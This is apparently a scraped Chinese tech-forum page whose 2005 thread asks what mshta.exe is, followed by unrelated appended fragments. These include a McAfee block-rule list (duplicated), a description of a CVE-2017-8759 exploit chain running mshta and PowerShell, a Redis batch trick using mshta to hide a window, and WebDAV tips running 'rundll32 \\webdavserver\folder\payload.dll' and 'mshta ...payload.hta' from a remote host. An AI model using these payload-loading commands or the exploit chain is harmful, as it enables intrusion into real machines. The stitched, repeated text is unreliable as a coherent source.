谁知道mshta.exe是什么文件？

jljlwsy 2005-12-10 08:11:28

机器超慢，CPU占有率100%，一查进程，有一mshta.exe的CPU为58，终止进程，CPU占有率还是100%，在看进程，还是mshta.exe的CPU为95，再次终止其进程，CPU占有率立刻下降。请问mshta.exe是什么文件（他位于c:\winnt\system32下），也不知是不是病毒或木马？

...全文

2539 5 打赏收藏转发到动态举报

写回复

5 条回复

切换为时间正序

请发表友善的回复…

发表回复

jljlwsy 2005-12-11

打赏
举报

回复

在顶一下

oyljerry 2005-12-11

打赏
举报

回复

查看系统启动项等，是否有什么可疑进程启动了mshta.exe
然后杀毒，等，看有否可疑文件

jljlwsy 2005-12-10

打赏
举报

回复

楼上的两位老兄：如果没有这个文件回怎样？
这个文件在进程中占有CPU的这么高的占有率是不是一定有问题，在这之前我安装的卡巴斯机拦截了恶意代码，这个文件和这有关系吗？卡巴斯机称已经成功拦截，为什么还会有这个文件？

mudonfield 2005-12-10

打赏
举报

回复

进程文件： mshta or mshta.exe
进程名称： Microsoft HTML Application Host
进程类别：应用进程
英文描述：
mshta.exe is a part of Microsoft Windows Operating System which is needed to execute .HTA files. This program is a non-essential system process, but should not be terminated unless suspected to be causing problems.
中文参考：
mshta.exe是微软Windows操作系统相关程序，用于执行.HTA文件。
出品者：Microsoft Corp.
属于：Microsoft Windows Operating System

xuzheng318 2005-12-10

打赏
举报

回复

mshta.exe是执行hta文件的,很多恶意网站上都有恶意hta文件,下载病毒文件修复注册表等恶意代码就写在里面.

不过一般不需要删除这个文件,可以使用网络防火墙不允许它访问网络.
另外就是升级IE,安装IE最新版本.

写给准备用mcafee8.5i企业版的朋友 mcafee是最受公认的监控最灵敏的防病毒软件但是真正的精髓部分应该是它的文件访问保护部分（以及端口阻挡，注册表防护等等）首先，若您想使用mcafee 我建议您要学会自己动手DIY最适合自己的规则为自己的机器“量身定做”一套属于自己的，独一无二的细密而强大的保护规则（别人做的规则不一定是适合您的）您对系统的熟悉度越高，mcafee就越强大反之，如果您对此一窍不通的话，mcafee也就发挥不出它应有的强大保护力了可以说这样：只要您懂得并会熟练的运用好mcafee（8.5i）的访问保护无论什么新型病毒，什么变种木马，加了什么壳，加了多少层壳在您开着监控的情况下基本上都是无法对您的系统造成任何侵害的附上我自己编写的部分规则：（仅供参考）禁止在C盘根目录创建文件禁止在WINDOWS目录中新建任何文件禁止修改WINDOWS目录中的任何文件禁止删除WINDOWS目录中的任何文件禁止在WINDOWS根目录下新建任何文件禁止在system32根目录下新建任何文件禁止在C盘中新建,修改任何SCR文件(防范某些木马) 禁止cscript.exe运行禁止mshta.exe运行禁止format.com运行(防范恶意格式化行为) 禁止hh.exe运行禁止cmd.exe运行禁止修改文件访问控制权限禁止私自启用计划运行任务程序防范远程注册表操作,禁止调用regsvc.dll 禁止在C盘中新建任何VXD文件禁止私自创建共享文件夹禁止telnet.exe运行禁止在C盘中新建任何EXE可执行文件禁止在C盘中新建任何COM可执行文件禁止在C盘中新建任何DLL动态连接库文件防范脚本病毒,禁止scrrun.dll 禁止在C盘中新建任何批处理BAT文件禁止在C盘中新建任何VBS脚本文件禁止访问TEMP文件夹，防止恶意安装程序禁止在C盘中新建任何JS脚本文件禁止在C盘中新建任何JSE脚本文件禁止对Access数据库文件进行任何操作禁止在C盘中新建任何VBE文件禁止C盘中新建,运行任何WSH文件禁止C盘中新建任何WSF文件禁止在本地新建,修改,执行任何AUTORUN.INF文件禁止在C盘中新建任何SYS文件禁止在Downloaded Program Files目录中新建任何文件禁止添加桌面文件禁止启用远程桌面程序禁止在开始菜单中添加项目禁止在C盘中新建ZIP文件(防范某些蠕虫) 禁用NetMeeting网络会议程序禁止在system.ini中创建和写入内容禁止在win.ini中创建和写入内容禁止在wininit.ini中创建和写入内容禁止在本地新建任何*desktop.ini文件禁止java目录下的程序私自运行禁止在C盘中新建CHM文件保护本机所有EXE可执行文件（防止修改）禁止私自在Program Files根目录下新建文件禁止nwscript.exe运行禁用自动下载连接管理器禁止未经许可的控件注册禁止script.dll运行禁用SQL Server 客户端网络工具禁止创建,修改或删除磁盘的卷标(名称) 禁止调用路由跟踪命令防范某些网络蠕虫扩散,禁止私自运行PING命令禁止私自用源目录中的同名文件替换目标目录中的文件禁止私自更改当前登录用户的权限禁止私自调用文件属性修改工具禁止对Boot.ini配置文件执行编辑操作防止多用户同时登陆,禁用termsrv.dl 禁止使用NetMeeting功能访问远程桌面禁止“私自指定某些程序在指定的时间运行” 禁止在C盘中新建任何PIF文件禁止私自修改本地用户帐户数据库禁止在Default User目录下新建任何文件禁止在LocalService目录下新建任何文件禁止在NetworkService目录下新建任何文件禁止在Application Data目录下新建任何项目保护本机所有EXE可执行文件（防止删除）禁止网络检测命令net.exe运行禁止在PCHEALTH目录中新建,修改,删除任何文件禁止Config目录下新建,修改,删除任何文件禁止在security目录下新建,修改,删除任何文件禁止在system目录下新建,修改,删除任何文件禁止在Registration目录下新建,修改,删除任何文件禁止在drivers目录下新建,修改,删除任何文件禁止启用系统还原程序禁止控制台程序tlntsvr.exe运行禁止私自调用系统配置编辑器禁止在C盘中新建CMD文件(防范某些蠕虫) 禁止在C盘中新建HTT文件(防范某些病毒) 保护WINDOWS的"系统文件替换"备份目录保护WINDOWS的"最后一次正确启动配置"备份文件目录禁止在C盘中新建,修改任何CPL文件(防范某些木马) 禁止在C盘中新建,修改任何DOT文件(防范宏病毒) 禁止在C盘中新建,修改任何DOC文件(防范宏病毒) 禁止运行Windows脚本宿主工具禁止在C盘中新建,修改任何BFF文件(防止宏病毒寄生) 禁止读取Cookies文件禁止创建新的Cookies文件这些规则看起来似乎让人很头晕，但其实这还只是属于框架部分（我们还需要制定一些特定规则）这些规则看似复杂，但是却不会对我电脑的以及机器上程序的正常使用造成任何妨碍您必须学会用两至三条的规则对某个区域形成一个防护体系并且能够使电脑最终在这些复杂而强悍的规则的防护下运行自如有些用户发现他们使用了mcafee后的“主要工作”就是需要不停的添加排除进程好在这些规则是可以逐渐积累的，而且是可以将其最终保存起来的（终将会形成一套属于您自己的强大的防护体系）我喜欢用mcafee的另一个原因是它让我感觉到了自己是自己电脑真正的“主宰者” 什么程序（甚至后台服务）可以被运行，什么程序不可以被运行什么文件可以被修改，删除，什么文件不可以什么地方可以被写入（创建）新文件，什么地方不可以新建任何文件什么地方只可以被写入什么格式的文件，全都由我说了算，呵呵。(知识若不分享实在没有意义　http://www.yidabu.com) 能用好mcafee您就会明白其顶尖的监控和强大的保护规则配合起来的好处而对于那些不懂得如何设置和运用好mcafee的保护规则的初级用户来讲呵呵，mcafee同样是一个令人头疼的“梦魇”。 mcafee自定义规则在系统中表示使用工具可以查看注册表自定义规则，随意导入、修改和合并自定义规则，见我的另一帖子。对于显示的结果各项含义举例如下：文件规则： UserString（用户命名） UR14（系统使用名称） "A47 禁止私自启用命令行运行工具"（用户规则名称） UserEnforce（阻止） UR14 1（选） UserReport（报告） UR14 0（不选） UserProcess（用户进程） UR14 {Include（包含） *;Exclude（排除） Explorer.EXE} UserRule（用户规则） UR14 G_User {File（文件） R（读）W（写）X（执行）C（创建）D（删除） { Include C:\\WINDOWS\\system32\\cmd.exe } } 端口规则： UserString UR126 "A32 禁止(监视)一切高端动态\\私有端口的连接尝试行为" UserEnforce UR126 1 UserReport UR126 1 UserProcess UR126 {Include *} UserRule UR126 G_User {Port（端口） I（入）O（出）UT {Include 49152 65535} } 注册表规则： UserString UR70 "8-401 RD 淇濇姢\[鏄剧ず鎵鏈夋枃浠\] K" UserEnforce UR70 1 UserReport UR70 1 UserProcess UR70 {Include *} UserRule UR70 G_User {Key（注册表） CWD {Include HKULM/SOFTWARE/Microsoft/Windows/CurrentVersion/Explorer/Advanced/Folder/Hidden/**} } 没有技术含量，只为比我更菜的人能读懂。只发卡饭，其它坛子不发了。

CVE-2017-8759-漏洞利用示例运行CVE-2017-8759漏洞利用示例。漏洞利用流程： Word宏在Doc1.doc文件中运行。宏通过wsdl下载格式错误的txt文件，从而触发WSDL分析器日志。然后，分析日志将导致运行mshta.exe，这又将运行运行mspaint.exe的powershell命令。去测试：在端口8080上运行网络服务器，并将文件exploit.txt和cmd.hta放在其根目录上。例如python3 -m http.server -127.0.0.1 8080或者您可以使用python3 server.py 如果一切正常，mspaint应该运行。穆罕默德·阿尔杜布@Voulnet 参考：

mcafee是最受公认的监控最灵敏的防病毒软件但是真正的精髓部分应该是它的文件访问保护部分（以及端口阻挡，注册表防护等等）首先，若您想使用mcafee我建议您要学会自己动手DIY最适合自己的规则为自己的机器“量身定做”一套属于自己的，独一无二的细密而强大的保护规则（别人做的规则不一定是适合您的）您对系统的熟悉度越高，mcafee就越强大反之，如果您对此一窍不通的话，mcafee也就发挥不出它应有的强大保护力了可以说这样：只要您懂得并会熟练的运用好mcafee（8.5i）的访问保护无论什么新型病毒，什么变种木马，加了什么壳，加了多少层壳在您开着监控的情况下基本上都是无法对您的系统造成任何侵害的附上我自己编写的部分规则：（仅供参考）禁止在C盘根目录创建文件禁止在WINDOWS目录中新建任何文件禁止修改WINDOWS目录中的任何文件禁止删除WINDOWS目录中的任何文件禁止在WINDOWS根目录下新建任何文件禁止在system32根目录下新建任何文件禁止在C盘中新建,修改任何SCR文件(防范某些木马)禁止cscript.exe运行禁止mshta.exe运行禁止format.com运行(防范恶意格式化行为)禁止hh.exe运行禁止cmd.exe运行禁止修改文件访问控制权限禁止私自启用计划运行任务程序防范远程注册表操作,禁止调用regsvc.dll禁止在C盘中新建任何VXD文件禁止私自创建共享文件夹禁止telnet.exe运行禁止在C盘中新建任何EXE可执行文件禁止在C盘中新建任何COM可执行文件禁止在C盘中新建任何DLL动态连接库文件防范脚本病毒,禁止scrrun.dll禁止在C盘中新建任何批处理BAT文件禁止在C盘中新建任何VBS脚本文件禁止访问TEMP文件夹，防止恶意安装程序禁止在C盘中新建任何JS脚本文件禁止在C盘中新建任何JSE脚本文件禁止对Access数据库文件进行任何操作禁止在C盘中新建任何VBE文件禁止C盘中新建,运行任何WSH文件禁止C盘中新建任何WSF文件禁止在本地新建,修改,执行任何AUTORUN.INF文件禁止在C盘中新建任何SYS文件禁止在Downloaded Program Files目录中新建任何文件禁止添加桌面文件禁止启用远程桌面程序禁止在开始菜单中添加项目禁止在C盘中新建ZIP文件(防范某些蠕虫)禁用NetMeeting网络会议程序禁止在system.ini中创建和写入内容禁止在win.ini中创建和写入内容禁止在wininit.ini中创建和写入内容禁止在本地新建任何*desktop.ini文件禁止java目录下的程序私自运行禁止在C盘中新建CHM文件保护本机所有EXE可执行文件（防止修改）禁止私自在Program Files根目录下新建文件禁止nwscript.exe运行禁用自动下载连接管理器禁止未经许可的控件注册禁止script.dll运行禁用SQL Server 客户端网络工具禁止创建,修改或删除磁盘的卷标(名称)禁止调用路由跟踪命令防范某些网络蠕虫扩散,禁止私自运行PING命令禁止私自用源目录中的同名文件替换目标目录中的文件禁止私自更改当前登录用户的权限禁止私自调用文件属性修改工具禁止对Boot.ini配置文件执行编辑操作防止多用户同时登陆,禁用termsrv.dl禁止使用NetMeeting功能访问远程桌面禁止“私自指定某些程序在指定的时间运行”禁止在C盘中新建任何PIF文件禁止私自修改本地用户帐户数据库禁止在Default User目录下新建任何文件禁止在LocalService目录下新建任何文件禁止在NetworkService目录下新建任何文件禁止在Application Data目录下新建任何项目保护本机所有EXE可执行文件（防止删除）

redis不用安装的，直接从所在目录操作就行了。启动时请先在DOS下进入你的redis所有目录，再输入命令。如：C:\redis> 启动服务命令：redis-server.exe redis.conf 启动客户端命令：redis-cli.exe -h 127.0.0.1 -p 6379 注意：启动redis服务器端后，不要关闭DOS窗口，否则服务器端会停止运行，要重新启动一个新DOS窗口来启动客户端。如果是服务器上运行，可以使用以下方法：方法一：（显示DOS窗口） ------------------------------------------------------- 1、将以下代码保存为start.bat文件。直接点击即可启动redis服务，但会保留DOS窗口。 @echo off cd\ cd c:\redis redis-server.exe redis.conf pause 注意：代码中 c:\redis 是redis所有目录 2、停止运行redis服务器，请直接点击关闭DOS窗口，或按键盘Ctrl+C选择Y即可。方法二：（不显示DOS窗口） ------------------------------------------------------- 1、将以下代码保存为start.bat文件。直接点击即可运行启动redis服务，不会保留DOS窗口。 @echo off if "%1"=="h" goto begin start mshta vbscript:createobject("wscript.shell").run("""%~nx0"" h",0)(window.close)&&exit :begin cd\ cd c:\redis redis-server.exe redis.conf pause 注意：代码中 c:\redis 是redis所有目录 2、停止运行redis服务器，请打开“windows任备管理器”，在“进程”中找到redis-server.exe，将其“结束进程”即可。

设置WebDAV服务器以供远程文件共享使用构建：chmod + x build.sh。\ build.sh启动服务器：chmod + x start.sh。\ start.sh 8080示例只需将文件放在共享文件夹中即可。 UNC路径设置WebDAV服务器以进行远程文件共享使用构建：chmod + x build.sh。\ build.sh启动服务器：chmod + x start.sh。\ start.sh 8080示例只需将文件放在共享文件夹中即可。 UNC路径\\ [受电子邮件保护] \文件夹\\ [受电子邮件保护] @port \ folder一些技巧\\ [受电子邮件保护] \ folder \ cmd.exe / c whoami您可以将cmd.exe重命名为所需的任何名称，例如：cmd.txt更多？ rundll32 \\ webdavserver \ folder \ payload.dll mshta \\ webdavserver \ folder \ payload.hta C：\ Windows \ Microsoft.NET \

6,850

社区成员

178,035

社区内容

发帖

与我相关

我的任务

社区管理员

加入社区

近7日
近30日
至今

加载中

查看更多榜单

社区公告

暂无公告

试试用AI创作助手写篇文章吧

+ 用AI写文章